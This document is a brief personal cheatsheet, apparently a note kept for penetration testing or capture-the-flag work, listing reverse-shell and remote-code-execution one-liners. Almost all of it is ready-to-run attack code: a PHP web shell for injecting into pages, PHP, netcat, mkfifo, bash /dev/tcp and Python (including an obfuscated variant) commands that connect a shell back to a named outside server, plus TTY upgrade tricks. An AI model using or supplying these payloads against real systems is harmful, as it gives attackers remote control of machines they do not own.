Last updated: 9 Oct 24 12:32:50 (UTC)

RCE Utility

RCE Utility

Here is a cheatsheet on reverse shells and remote code execution in general

main source in case you need more

Upgrading to full TTY

python3 -c 'import pty; pty.spawn("/bin/bash")'

or

script /dev/null -qc /bin/bash

CTRL-Z then stty raw -echo && fg

note: if it crashes directly enter the reset command

export TERM=xterm-256color

executing a reverse shell for : IP = lawcky.net (own server) PORT = 51951

PHP

to inject in a webpage

<?php system($_GET['cmd']); ?>

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc lawcky.net 4444 >/tmp/f"); ?>

to execute

php -r '$sock=fsockopen("lawcky.net",51951);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("lawcky.net",51951);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

Netcat

nc -e /bin/sh lawcky.net 51951

nc -e /bin/bash lawcky.net 51951

nc -c bash lawcky.net 51951

SHELL

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc lawcky.net 51951 >/tmp/f

BASH

bash -i >& /dev/tcp/lawcky.net/51951 0>&1

/bin/bash -l > /dev/tcp/lawcky.net/51951 0<&1 2>&1

bash -c 'bash -i >& /dev/tcp/lawcky.net/51951 0>&1'

Python

export RHOST="lawcky.net";export RPORT=51951;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("lawcky.net",51951));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("lawcky.net",51951));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'

Joplin Server v2.14.2, copyright © 2021-2024 JOPLIN.